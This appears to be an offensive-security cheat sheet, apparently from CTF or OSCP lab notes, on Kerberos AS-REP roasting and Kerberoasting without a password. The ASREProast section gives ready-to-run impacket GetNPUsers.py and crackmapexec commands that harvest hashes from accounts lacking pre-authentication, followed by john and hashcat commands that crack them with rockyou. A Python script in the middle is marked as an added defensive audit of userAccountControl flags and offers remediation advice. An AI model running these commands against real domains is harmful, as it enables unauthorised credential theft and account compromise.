Kerberos Attack w/o password
Kerberos attacks that need only a username; no credentials are required.
ASREProast
AS-REP roasting is a technique for retrieving crackable password hashes for user accounts that have the "Do not require Kerberos preauthentication" property set.
Linux
# Get ASREProastable credentials
GetNPUsers.py rebound.htb/ -usersfile users-rebound.htb.txt -format john
GetNPUsers.py oscp.lab/ -usersfile usernames.txt -format hashcat
GetNPUsers.py brute.com/ -usersfile users-brute.com.txt -dc-ip 172.31.3.3 -format john
GetNPUsers.py blackfield.local/ -usersfile users-blackfield.local.txt -dc-ip $RHOST -format john -outputfile ./hash-ASREP.txt
# user list queried dynamically through an LDAP anonymous bind
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
# With crackmapexec
crackmapexec ldap rebound.htb -u users.txt -p '' --asreproast hash-ASREP.txt
# Crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash-ASREP.txt
hashcat -m 18200 -a 0 hash-ASREP.txt /usr/share/wordlists/rockyou.txt --show
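The exposure described above comes from a single userAccountControl bit, so the defender-side check is an audit of that attribute. The script below is an added example, not part of the original notes: it takes a constructed export of account records (the field names and values are assumptions standing in for an LDAP query result) and reports the enabled accounts that would answer an AS-REQ without pre-authentication.

```python
# Audit userAccountControl values for accounts exposed to AS-REP roasting.
# Added example, not from the original notes. SAMPLE_ACCOUNTS is constructed;
# in practice the records come from an LDAP search such as
# (userAccountControl:1.2.840.113556.1.4.803:=4194304) (bitwise AND rule).
from typing import Dict, List, Union

# userAccountControl bit flags as documented in [MS-ADTS]
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304, "Do not require Kerberos preauthentication"

# Constructed sample export (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS: List[Dict[str, Union[str, int]]] = [
    {"sAMAccountName": "alice", "userAccountControl": 512},            # NORMAL_ACCOUNT
    {"sAMAccountName": "svc_backup", "userAccountControl": 4194816},   # 512 | 0x400000
    {"sAMAccountName": "old_svc", "userAccountControl": 4194818},      # disabled + no preauth
    {"sAMAccountName": "bob", "userAccountControl": 66048},            # 512 | DONT_EXPIRE_PASSWD
]


def asrep_roastable(accounts: List[Dict[str, Union[str, int]]]) -> List[str]:
    """Return the names of enabled accounts with DONT_REQUIRE_PREAUTH set."""
    exposed = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])  # exports often carry the value as a string
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE:
            # A disabled account gets KDC_ERR_CLIENT_REVOKED instead of an AS-REP,
            # so no encrypted blob is handed out; skip it but keep it in mind for cleanup.
            continue
        exposed.append(str(acct["sAMAccountName"]))
    return exposed


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: pre-authentication disabled; re-enable it or rotate to a long random password")
```

Remediation is to clear the flag unless a legacy client genuinely needs it; where it must stay, a long random password keeps the returned AS-REP blob out of reach of wordlist cracking.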
Kerberoast w/o password
Kerberoast w/o pre-authentication
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).